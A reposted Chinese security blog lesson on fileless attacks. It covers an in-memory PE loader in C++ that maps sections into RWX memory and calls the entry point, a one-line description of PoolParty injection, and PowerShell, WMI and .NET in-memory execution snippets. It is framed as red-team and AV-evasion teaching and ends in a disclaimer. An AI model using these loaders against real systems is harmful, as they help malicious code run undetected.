2026-03-30 00:04:01 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档阐述了内存执行技术在无文件攻击中的应用，核心涵盖内存加载PE原理与C++实现，模拟Windows加载器规避磁盘检测。同时介绍了PoolParty注入技术利用内核池漏洞的方法，以及PowerShell、WMI和.NET等无文件攻击实战代码。内容结合技术细节与案例分析，为理解攻击者如何绕过传统防护提供了详实的技术参考与实现路径。 综合评分： 89 文章分类： 红队,恶意软件,实战经验,免杀

cover_image

内存执行技术——无文件攻击的核心

原创

pandazhengzheng pandazhengzheng

安全分析与研究

2026年3月26日 08:31 广东

一、前言概述

内存执行技术是指将恶意代码直接加载到内存中执行，而不写入磁盘，以规避基于文件的检测。本课将深入介绍内存加载PE、PoolParty注入和无文件攻击技术。

二、相关内容

2.1 内存执行技术概述

主要技术：

内存加载PE（In-Memory PE Loading）
Shellcode执行
PoolParty注入
无文件攻击

2.2 内存加载PE（In-Memory PE Loading）

原理：将PE文件直接加载到内存中执行，而不写入磁盘，需要手动模拟Windows加载器的工作。

PE加载过程：

1. 读取PE文件到内存
2. 解析PE头
3. 分配内存
4. 映射节区
5. 处理重定位
6. 解析导入表
7. 调用入口点

代码实现：

void*&nbsp;LoadPEInMemory(unsigned&nbsp;char* peData)&nbsp;{
&nbsp; &nbsp; PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peData;
&nbsp; &nbsp; PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(peData + dosHeader->e_lfanew);

&nbsp; &nbsp; LPVOID baseAddress = VirtualAlloc(NULL, ntHeaders->OptionalHeader.SizeOfImage,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

&nbsp; &nbsp;&nbsp;memcpy(baseAddress, peData, ntHeaders->OptionalHeader.SizeOfHeaders);

&nbsp; &nbsp; PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
&nbsp; &nbsp;&nbsp;for&nbsp;(int&nbsp;i =&nbsp;0; i < ntHeaders->FileHeader.NumberOfSections; i++) {
&nbsp; &nbsp; &nbsp; &nbsp; LPVOID sectionDest = (LPVOID)((DWORD64)baseAddress + sectionHeader[i].VirtualAddress);
&nbsp; &nbsp; &nbsp; &nbsp; LPVOID sectionSrc = (LPVOID)(peData + sectionHeader[i].PointerToRawData);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;memcpy(sectionDest, sectionSrc, sectionHeader[i].SizeOfRawData);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;// 处理重定位和导入表...

&nbsp; &nbsp; DLLMAIN entryPoint = (DLLMAIN)((DWORD64)baseAddress + ntHeaders->OptionalHeader.AddressOfEntryPoint);
&nbsp; &nbsp; entryPoint((HINSTANCE)baseAddress, DLL_PROCESS_ATTACH,&nbsp;NULL);

&nbsp; &nbsp;&nbsp;return&nbsp;baseAddress;
}

2.3 PoolParty注入

原理：利用Windows内核池（Kernel Pool）的内存管理漏洞进行注入，通过操纵内核池的内存分配，可以在目标进程中执行代码。

2.4 无文件攻击技术

PowerShell攻击：

$code = [System.Convert]::FromBase64String("...")
[System.Runtime.InteropServices.Marshal]::Copy($code, 0, $ptr, $code.Length)

WMI攻击：

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "malicious command"

.NET内存加载：

Assembly asm = Assembly.Load(bytes);
asm.GetType("Program").GetMethod("Main").Invoke(null,&nbsp;null);

2.5 实战案例分析

2.5.1 案例1：内存加载PE执行恶意程序

攻击场景：攻击者需要在目标系统上执行恶意PE文件，但不希望文件写入磁盘。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全分析与研究 pandazhengzheng pandazhengzheng《内存执行技术——无文件攻击的核心》